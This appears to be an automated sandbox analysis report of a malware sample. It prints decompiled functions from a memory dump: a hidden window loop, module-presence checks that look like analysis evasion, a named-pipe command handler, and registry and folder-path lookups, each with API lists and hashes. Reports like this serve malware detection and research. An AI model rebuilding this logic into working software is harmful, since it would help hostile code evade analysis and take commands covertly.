                                    • Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
                                    • Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
                                    • Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
                                    • Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E000C2EDA(void* __eflags) {
                                    				CHAR* _v12;
                                    				struct HINSTANCE__* _v32;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				void _v52;
                                    				char _v80;
                                    				char _v144;
                                    				intOrPtr _t25;
                                    				intOrPtr _t32;
                                    				struct HWND__* _t34;
                                    				intOrPtr _t36;
                                    				intOrPtr _t39;
                                    				struct HWND__* _t44;
                                    				intOrPtr _t47;
                                    				intOrPtr _t50;
                                    				void* _t51;
                                    				intOrPtr _t53;
                                    				intOrPtr _t56;
                                    				intOrPtr _t59;
                                    				struct HINSTANCE__* _t64;
                                    
                                    				_t25 =  *0xde684; // 0x27bf8f0
                                    				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                                    				memset( &_v52, 0, 0x30);
                                    				_t59 =  *0xde688; // 0xf0000
                                    				E000C902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                                    				_v48 = 3;
                                    				_v52 = 0x30;
                                    				_v12 =  &_v144;
                                    				_v44 = E000C2E77;
                                    				_push( &_v52);
                                    				_t32 =  *0xde694; // 0x27bfa48
                                    				_v32 = _t64;
                                    				if( *((intOrPtr*)(_t32 + 8))() == 0) {
                                    					L6:
                                    					_t34 =  *0xde718; // 0x6029a
                                    					if(_t34 != 0) {
                                    						_t39 =  *0xde694; // 0x27bfa48
                                    						 *((intOrPtr*)(_t39 + 0x28))(_t34);
                                    					}
                                    					L8:
                                    					_t36 =  *0xde694; // 0x27bfa48
                                    					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
                                    					return 0;
                                    				}
                                    				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
                                    				 *0xde718 = _t44;
                                    				if(_t44 == 0) {
                                    					goto L8;
                                    				}
                                    				ShowWindow(_t44, 0);
                                    				_t47 =  *0xde694; // 0x27bfa48
                                    				 *((intOrPtr*)(_t47 + 0x18))( *0xde718);
                                    				while(1) {
                                    					_t50 =  *0xde694; // 0x27bfa48
                                    					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
                                    					if(_t51 == 0) {
                                    						goto L6;
                                    					}
                                    					if(_t51 == 0xffffffff) {
                                    						goto L6;
                                    					}
                                    					_t53 =  *0xde694; // 0x27bfa48
                                    					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
                                    					_t56 =  *0xde694; // 0x27bfa48
                                    					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
                                    				}
                                    				goto L6;
                                    			}
























                                    APIs
                                    • memset.MSVCRT ref: 000C2EF9
                                    • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 000C2F77
                                    • ShowWindow.USER32(00000000,00000000), ref: 000C2F8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Window$CreateShowmemset
                                    • String ID: 0
                                    • API String ID: 3027179219-4108050209
                                    • Opcode ID: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
                                    • Instruction ID: a9f914c0b4fadeb3d72a178da7fd84f66818822a173e8fe5a0fe974533a9003f
                                    • Opcode Fuzzy Hash: 6eaffb3ee9b8b2be26461f6bad7f1446fdbb12cf683fc5f7db915b76c7ab6cb2
                                    • Instruction Fuzzy Hash: ED31F5B1501218AFF750EF68DC89FAA7BBCEB18344F00406AB909DB262D634DD058B71
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                    				char _v516;
                                    				char _v556;
                                    				char _v564;
                                    				char _v568;
                                    				char _v572;
                                    				char _v576;
                                    				intOrPtr _v580;
                                    				char _v588;
                                    				signed int _v596;
                                    				intOrPtr _v602;
                                    				intOrPtr _v604;
                                    				char _v608;
                                    				CHAR* _v612;
                                    				CHAR* _v616;
                                    				signed int _v620;
                                    				signed int _v624;
                                    				signed int _v628;
                                    				signed int _v632;
                                    				char _v636;
                                    				intOrPtr _t119;
                                    				void* _t120;
                                    				signed int _t122;
                                    				intOrPtr _t123;
                                    				CHAR* _t124;
                                    				intOrPtr _t125;
                                    				CHAR* _t127;
                                    				WCHAR* _t130;
                                    				intOrPtr _t133;
                                    				intOrPtr _t137;
                                    				WCHAR* _t138;
                                    				intOrPtr _t142;
                                    				WCHAR* _t143;
                                    				CHAR* _t144;
                                    				intOrPtr _t145;
                                    				intOrPtr _t150;
                                    				intOrPtr _t153;
                                    				WCHAR* _t154;
                                    				signed int _t159;
                                    				WCHAR* _t160;
                                    				intOrPtr _t163;
                                    				intOrPtr _t165;
                                    				intOrPtr _t166;
                                    				intOrPtr _t170;
                                    				signed int _t173;
                                    				signed int _t178;
                                    				intOrPtr _t182;
                                    				WCHAR* _t184;
                                    				char _t186;
                                    				WCHAR* _t188;
                                    				intOrPtr _t200;
                                    				intOrPtr _t211;
                                    				signed int _t215;
                                    				char _t220;
                                    				WCHAR* _t231;
                                    				intOrPtr _t235;
                                    				intOrPtr _t238;
                                    				intOrPtr _t239;
                                    				intOrPtr _t246;
                                    				signed int _t248;
                                    				WCHAR* _t249;
                                    				CHAR* _t250;
                                    				intOrPtr _t262;
                                    				void* _t271;
                                    				intOrPtr _t272;
                                    				signed int _t277;
                                    				void* _t278;
                                    				intOrPtr _t280;
                                    				signed int _t282;
                                    				void* _t298;
                                    				void* _t299;
                                    				intOrPtr _t305;
                                    				CHAR* _t326;
                                    				void* _t328;
                                    				WCHAR* _t329;
                                    				intOrPtr _t331;
                                    				WCHAR* _t333;
                                    				signed int _t335;
                                    				intOrPtr* _t337;
                                    				void* _t338;
                                    				void* _t339;
                                    				void* _t353;
                                    
                                    				_t353 = __fp0;
                                    				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                    				_t119 =  *0xde688; // 0xf0000
                                    				_v620 = _v620 & 0x00000000;
                                    				_t328 = __ecx;
                                    				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                    					L7:
                                    					_t120 = E000CB7A8(0xdb9c8,  &_v516); // executed
                                    					_t14 = _t120 + 1; // 0x1
                                    					E000CA86D( &_v556, _t14, _t351);
                                    					_t298 = 0x64;
                                    					_t122 = E000CA471( &_v556, _t298);
                                    					 *0xde748 = _t122;
                                    					if(_t122 != 0) {
                                    						_push(0x4e5);
                                    						_t299 = 0x10;
                                    						_t123 = E000CE1BC(0xdb9cc, _t299); // executed
                                    						 *0xde680 = _t123;
                                    						 *_t337 = 0x610;
                                    						_t124 = E000C95E1(0xdb9cc);
                                    						_push(0);
                                    						_push(_t124);
                                    						_v612 = _t124;
                                    						_t125 =  *0xde688; // 0xf0000
                                    						_t127 = E000C92E5(_t125 + 0x228);
                                    						_t338 = _t337 + 0xc;
                                    						_v616 = _t127;
                                    						E000C85D5( &_v612);
                                    						_t130 = E000CB269(_t127);
                                    						_t246 = 3;
                                    						__eflags = _t130;
                                    						if(_t130 != 0) {
                                    							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                    							 *_t328 = _t246;
                                    						}
                                    						E000C861A( &_v616, 0xfffffffe);
                                    						_t133 =  *0xde688; // 0xf0000
                                    						_t22 = _t133 + 0x114; // 0xf0114
                                    						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                    						_t262 =  *0xde688; // 0xf0000
                                    						_t339 = _t338 + 0x14;
                                    						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                    						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                    							L17:
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							_v572 = _t328;
                                    							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                    							_t137 =  *0xde680; // 0x27bfdb0
                                    							_t138 =  *(_t137 + 8);
                                    							__eflags = _t138;
                                    							if(_t138 != 0) {
                                    								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
                                    							}
                                    							_v620 = _v620 & 0x00000000;
                                    							E000CE2C6(_t353,  &_v576); // executed
                                    							_pop(_t262);
                                    							_t142 =  *0xde6b4; // 0x27bfa98
                                    							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                    							__eflags = _t143;
                                    							if(_t143 == 0) {
                                    								E000CE2C6(_t353,  &_v588);
                                    								_t235 =  *0xde6b4; // 0x27bfa98
                                    								_pop(_t262);
                                    								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                    							}
                                    							__eflags =  *0xde73c;
                                    							if( *0xde73c <= 0) {
                                    								goto L36;
                                    							} else {
                                    								_t165 =  *0xde680; // 0x27bfdb0
                                    								__eflags =  *(_t165 + 8);
                                    								if( *(_t165 + 8) != 0) {
                                    									_t231 =  *(_t165 + 0xc);
                                    									__eflags = _t231;
                                    									if(_t231 != 0) {
                                    										 *_t231(_v580);
                                    									}
                                    								}
                                    								_t166 =  *0xde688; // 0xf0000
                                    								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                    								__eflags = _t262 - _t246;
                                    								if(_t262 == _t246) {
                                    									goto L36;
                                    								} else {
                                    									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                    									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                    										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                    										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                    											E000C49A5();
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											asm("stosd");
                                    											_t170 =  *0xde684; // 0x27bf8f0
                                    											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                    											_t262 = _v602;
                                    											_t248 = 0x3c;
                                    											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                    											_v596 = _t173;
                                    											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                    											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                    											_v624 = _t178;
                                    											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                    											_t182 =  *0xde688; // 0xf0000
                                    											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
                                    											_t339 = _t339 + 0xc;
                                    											__eflags = _t184;
                                    											if(_t184 >= 0) {
                                    												_t333 = E000C8604(0x1000);
                                    												_v616 = _t333;
                                    												_pop(_t262);
                                    												__eflags = _t333;
                                    												if(_t333 != 0) {
                                    													_t186 = E000C109A(_t262, 0x148);
                                    													_t305 =  *0xde688; // 0xf0000
                                    													_v636 = _t186;
                                    													_push(_t305 + 0x648);
                                    													_push(0xa);
                                    													_push(7);
                                    													_t271 = 2;
                                    													E000C902D(_t271,  &_v572);
                                    													_t272 =  *0xde688; // 0xf0000
                                    													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                    													_t339 = _t339 + 0x18;
                                    													_v632 = _t188;
                                    													__eflags = _t188;
                                    													if(_t188 != 0) {
                                    														_push(_v624 % _t248 & 0x0000ffff);
                                    														_push(_v628 & 0x0000ffff);
                                    														_push(_v596 % _t248 & 0x0000ffff);
                                    														_push(_v620 & 0x0000ffff);
                                    														_push(_v632);
                                    														_push( &_v572);
                                    														_t200 =  *0xde688; // 0xf0000
                                    														__eflags = _t200 + 0x1020;
                                    														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                    														E000C85D5( &_v636);
                                    														E000CA911(_t333, 0, 0xbb8, 1); // executed
                                    														E000C861A( &_v632, 0xfffffffe);
                                    														_t339 = _t339 + 0x44;
                                    													}
                                    													E000C861A( &_v616, 0xfffffffe); // executed
                                    													_pop(_t262);
                                    												}
                                    											}
                                    										}
                                    										goto L36;
                                    									}
                                    									__eflags = _t262 - 2;
                                    									if(_t262 != 2) {
                                    										goto L36;
                                    									}
                                    									E000C49A5();
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									asm("stosd");
                                    									_t211 =  *0xde684; // 0x27bf8f0
                                    									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                    									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                    									_v628 = _t215;
                                    									_t277 = 0x3c;
                                    									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                    									_t249 = E000C8604(0x1000);
                                    									_v624 = _t249;
                                    									_pop(_t278);
                                    									__eflags = _t249;
                                    									if(_t249 != 0) {
                                    										_t220 = E000C95E1(_t278, 0x32d);
                                    										_t280 =  *0xde688; // 0xf0000
                                    										_push(_t280 + 0x228);
                                    										_t282 = 0x3c;
                                    										_v636 = _t220;
                                    										_push(_v628 % _t282 & 0x0000ffff);
                                    										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                    										E000C85D5( &_v636);
                                    										E000CA911(_t249, 0, 0xbb8, 1);
                                    										E000C861A( &_v624, 0xfffffffe);
                                    									}
                                    									goto L41;
                                    								}
                                    							}
                                    						} else {
                                    							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                    							__eflags = _t238 - _t246;
                                    							if(_t238 == _t246) {
                                    								goto L17;
                                    							}
                                    							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                    							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                    								L36:
                                    								_t144 = E000C95E1(_t262, 0x610);
                                    								_push(0);
                                    								_push(_t144);
                                    								_v616 = _t144;
                                    								_t145 =  *0xde688; // 0xf0000
                                    								_t329 = E000C92E5(_t145 + 0x228);
                                    								_v612 = _t329;
                                    								__eflags = _t329;
                                    								if(_t329 != 0) {
                                    									_t160 = E000CB269(_t329);
                                    									__eflags = _t160;
                                    									if(_t160 != 0) {
                                    										_t163 =  *0xde684; // 0x27bf8f0
                                    										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                    									}
                                    									E000C861A( &_v612, 0xfffffffe);
                                    								}
                                    								E000C85D5( &_v616);
                                    								_t150 =  *0xde688; // 0xf0000
                                    								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
                                    								_t153 =  *0xde688; // 0xf0000
                                    								_t154 = _t153 + 0x228;
                                    								__eflags = _t154;
                                    								lstrcpynW(_t154,  *0xde738, 0x105);
                                    								_t331 =  *0xde688; // 0xf0000
                                    								_t117 = _t331 + 0x228; // 0xf0228
                                    								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
                                    								E000C861A(0xde740, 0xfffffffe);
                                    								E000C861A(0xde738, 0xfffffffe);
                                    								L41:
                                    								_t159 = 0;
                                    								__eflags = 0;
                                    								L42:
                                    								return _t159;
                                    							}
                                    							__eflags = _t238 - 2;
                                    							if(_t238 != 2) {
                                    								goto L36;
                                    							}
                                    							goto L17;
                                    						}
                                    					}
                                    					L8:
                                    					_t159 = _t122 | 0xffffffff;
                                    					goto L42;
                                    				}
                                    				_t250 = E000C95C7(0x6e2);
                                    				_v616 = _t250;
                                    				_t326 = E000C95C7(0x9f5);
                                    				_v612 = _t326;
                                    				if(_t250 != 0 && _t326 != 0) {
                                    					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                    						_v620 = 1;
                                    					}
                                    					E000C85C2( &_v616);
                                    					_t122 = E000C85C2( &_v612);
                                    					_t351 = _v620;
                                    					if(_v620 != 0) {
                                    						goto L8;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
                                    • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
                                    • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: HandleModulelstrcpyn
                                    • String ID:
                                    • API String ID: 3430401031-0
                                    • Opcode ID: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
                                    • Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
                                    • Opcode Fuzzy Hash: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
                                    • Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E000C32A1() {
                                    				char _v8;
                                    				struct _OVERLAPPED* _v12;
                                    				struct _OVERLAPPED* _v16;
                                    				intOrPtr* _v20;
                                    				char _v24;
                                    				intOrPtr _v32;
                                    				signed int _v36;
                                    				intOrPtr* _v40;
                                    				char _v168;
                                    				char _v172;
                                    				intOrPtr _t41;
                                    				void* _t47;
                                    				char _t54;
                                    				char _t61;
                                    				intOrPtr _t64;
                                    				void* _t65;
                                    				void* _t68;
                                    				void* _t70;
                                    				void* _t72;
                                    				void* _t76;
                                    				struct _OVERLAPPED* _t82;
                                    				intOrPtr* _t83;
                                    				signed int _t84;
                                    				signed short* _t86;
                                    				intOrPtr* _t97;
                                    				signed short* _t105;
                                    				void* _t107;
                                    				void* _t108;
                                    				void* _t109;
                                    				intOrPtr* _t112;
                                    				struct _OVERLAPPED* _t113;
                                    				char _t114;
                                    				void* _t115;
                                    
                                    				_t113 = 0;
                                    				_t82 = 0;
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				while(1) {
                                    					_v16 = _t113;
                                    					if(ConnectNamedPipe( *0xde674, _t113) == 0 && GetLastError() != 0x217) {
                                    						break;
                                    					}
                                    					_push(_t113);
                                    					_push( &_v16);
                                    					_t41 =  *0xde684; // 0x27bf8f0
                                    					_push(0x80000);
                                    					_push( *0xde724);
                                    					_push( *0xde674);
                                    					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
                                    						GetLastError();
                                    					} else {
                                    						_t86 =  *0xde724; // 0x2b40020
                                    						_t47 = ( *_t86 & 0x0000ffff) - 1;
                                    						if(_t47 == 0) {
                                    							_t112 = E000C93BE( &(_t86[4]), 0x20, 1,  &_v24);
                                    							_v40 = _t112;
                                    							if(_t112 != 0) {
                                    								_t114 = _v24;
                                    								if(_t114 <= 1) {
                                    									_t113 = 0;
                                    									_t54 = E000C1DA0(E000C9749( *_t112), 0, 0, 0);
                                    									_t115 = _t115 + 0x10;
                                    									_v172 = _t54;
                                    								} else {
                                    									_v36 = _t114 - 1;
                                    									_t83 = E000C8604(_t114 - 1 << 2);
                                    									_v32 = _t83;
                                    									if(_t83 == 0) {
                                    										_t113 = 0;
                                    									} else {
                                    										if(_t114 > 1) {
                                    											_v20 = _t83;
                                    											_t84 = 1;
                                    											do {
                                    												_t64 = E000C91A6( *((intOrPtr*)(_t112 + _t84 * 4)), E000CC379( *((intOrPtr*)(_t112 + _t84 * 4))));
                                    												_t97 = _v20;
                                    												_t84 = _t84 + 1;
                                    												 *_t97 = _t64;
                                    												_v20 = _t97 + 4;
                                    											} while (_t84 < _t114);
                                    											_t83 = _v32;
                                    										}
                                    										_t113 = 0;
                                    										_t61 = E000C1DA0(E000C9749( *_t112), _t83, _v36, 0);
                                    										_t115 = _t115 + 0x10;
                                    										_v172 = _t61;
                                    										E000C94B7( &_v24);
                                    									}
                                    									_t82 = _v12;
                                    								}
                                    							}
                                    							_t105 =  *0xde724; // 0x2b40020
                                    							E000C96CA( &_v168,  &(_t105[4]), 0x80);
                                    							_push(0x84);
                                    							_push( &_v172);
                                    							_push(2);
                                    							goto L33;
                                    						} else {
                                    							_t65 = _t47 - 3;
                                    							if(_t65 == 0) {
                                    								_push(_t113);
                                    								_push(_t113);
                                    								_t108 = 5;
                                    								E000CC319(_t108);
                                    								 *0xde758 = 1;
                                    								_t82 = 1;
                                    								_v12 = 1;
                                    							} else {
                                    								_t68 = _t65;
                                    								if(_t68 == 0) {
                                    									_t70 = E000CF79F( &_v8);
                                    									goto L13;
                                    								} else {
                                    									_t72 = _t68 - 1;
                                    									if(_t72 == 0) {
                                    										E000CF79F( &_v8);
                                    										goto L16;
                                    									} else {
                                    										_t76 = _t72 - 1;
                                    										if(_t76 == 0) {
                                    											_t70 = E000CF7C1( &_v8);
                                    											L13:
                                    											if(_t70 == 0) {
                                    												_push(_t113);
                                    												_push(_t113);
                                    												_push(0xa);
                                    											} else {
                                    												_push(_v8);
                                    												_push(_t70);
                                    												_push(5);
                                    											}
                                    											_pop(_t109);
                                    											E000CC319(_t109);
                                    										} else {
                                    											if(_t76 == 1) {
                                    												E000CF7C1( &_v8);
                                    												L16:
                                    												_push(4);
                                    												_push( &_v8);
                                    												_push(5);
                                    												L33:
                                    												_pop(_t107);
                                    												E000CC319(_t107);
                                    												_t115 = _t115 + 0xc;
                                    											}
                                    										}
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					DisconnectNamedPipe( *0xde674);
                                    					if(_t82 == 0) {
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				return 0;
                                    			}

                                    APIs
                                    • ConnectNamedPipe.KERNELBASE(00000000), ref: 000C32C6
                                    • GetLastError.KERNEL32 ref: 000C32D0
                                      • Part of subcall function 000CC319: FlushFileBuffers.KERNEL32(000001E0), ref: 000CC35F
                                    • DisconnectNamedPipe.KERNEL32 ref: 000C34B4
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                                    • String ID:
                                    • API String ID: 2389948835-0
                                    • Opcode ID: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
                                    • Instruction ID: 58aa84d8eb2c3f5bebb521c1968008652298eb85fb782967e61da74a0d83595a
                                    • Opcode Fuzzy Hash: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
                                    • Instruction Fuzzy Hash: EA512471A10205AFDB61EFA4DC89FEEBBB8EF05300F10812EF504A6152DB349B44CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E000CB012(void* __ecx, WCHAR* __edx) {
                                    				int _v8;
                                    				void _v528;
                                    				char _v1046;
                                    				void _v1048;
                                    				intOrPtr _t21;
                                    				intOrPtr* _t26;
                                    				void* _t27;
                                    				intOrPtr _t33;
                                    				intOrPtr _t36;
                                    				void* _t39;
                                    				intOrPtr _t40;
                                    				WCHAR* _t47;
                                    				void* _t49;
                                    
                                    				_t39 = __ecx;
                                    				_v8 = 0x104;
                                    				_t47 = __edx;
                                    				memset( &_v1048, 0, 0x208);
                                    				memset( &_v528, 0, 0x208);
                                    				_t21 =  *0xde698; // 0x27bfbc8
                                    				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
                                    				_t49 = E000CB946(_t39);
                                    				_t26 =  *0xde6b8; // 0x27bfbd8
                                    				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
                                    				if(_t27 == 0) {
                                    					_t33 =  *0xde688; // 0xf0000
                                    					if(E000CBB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
                                    						_t36 =  *0xde698; // 0x27bfbc8
                                    						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
                                    					}
                                    				}
                                    				_t40 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t40 + 0x30))(_t49);
                                    				lstrcpynW(_t47,  &_v1046 + E000CC392( &_v528) * 2, 0x104);
                                    				return 1;
                                    			}

















                                    APIs
                                    • memset.MSVCRT ref: 000CB037
                                    • memset.MSVCRT ref: 000CB045
                                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000CB05F
                                      • Part of subcall function 000CB946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB959
                                      • Part of subcall function 000CB946: GetLastError.KERNEL32(?,?,000CBA7C,74EC17D9,10000000), ref: 000CB967
                                      • Part of subcall function 000CB946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB980
                                    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000CB0D0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
                                    • String ID:
                                    • API String ID: 3158470084-0
                                    • Opcode ID: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
                                    • Instruction ID: 51dd89181f6f65cfcdbed33b84d5b23baa4a46682fef0b4f5f6547b1bf5b27aa
                                    • Opcode Fuzzy Hash: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
                                    • Instruction Fuzzy Hash: 8C2196B1501218AFE710EB94DCC5EDB37BCEB58354F1040A5F605D7192D7749E458B70
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CBF37(short* __edx, short* _a4) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				char* _v20;
                                    				char* _t30;
                                    				intOrPtr _t31;
                                    				char* _t49;
                                    
                                    				_v16 = 0;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
                                    					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                    						L6:
                                    						if(_v8 != 0) {
                                    							_t31 =  *0xde68c; // 0x27bfab8
                                    							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
                                    						}
                                    						_t30 = 0;
                                    						L9:
                                    						return _t30;
                                    					}
                                    					_t49 = E000C8604(_v12);
                                    					_v20 = _t49;
                                    					if(_t49 == 0) {
                                    						goto L6;
                                    					}
                                    					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
                                    						RegCloseKey(_v8);
                                    						_t30 = _t49;
                                    						goto L9;
                                    					}
                                    					E000C861A( &_v20, 0xfffffffe);
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}











                                    APIs
                                    • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000C2C08,00000000), ref: 000CBF5E
                                    • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,?,00000000,000C2C08,00000000,?,?,000C2C08,00000000), ref: 000CBF82
                                    • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,00000000,00000000,000C2C08,?,?,000C2C08,00000000), ref: 000CBFB0
                                    • RegCloseKey.KERNEL32(00000000,?,?,000C2C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000CBFE5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
                                    • Instruction ID: 5287311d19161c5311007a090eb7e9ccf09f1a8ec080f3f080957cd4843ff4b4
                                    • Opcode Fuzzy Hash: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
                                    • Instruction Fuzzy Hash: 9E210976900118FFDB10DFA5DC45E9EBBF8EF54740F1141AAB905E6261D7309A01DB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000CBE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				intOrPtr* _t43;
                                    				char* _t46;
                                    
                                    				_t46 = 0;
                                    				_v8 = 0;
                                    				_v16 = 0;
                                    				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
                                    					return 0;
                                    				}
                                    				_v12 = 0;
                                    				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
                                    					_t46 = E000C8604(_v12 + 1);
                                    					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
                                    						_t43 = _a12;
                                    						if(_t43 != 0) {
                                    							 *_t43 = _v12;
                                    						}
                                    					}
                                    				}
                                    				if(_v8 != 0) {
                                    					RegCloseKey(_v8);
                                    				}
                                    				return _t46;
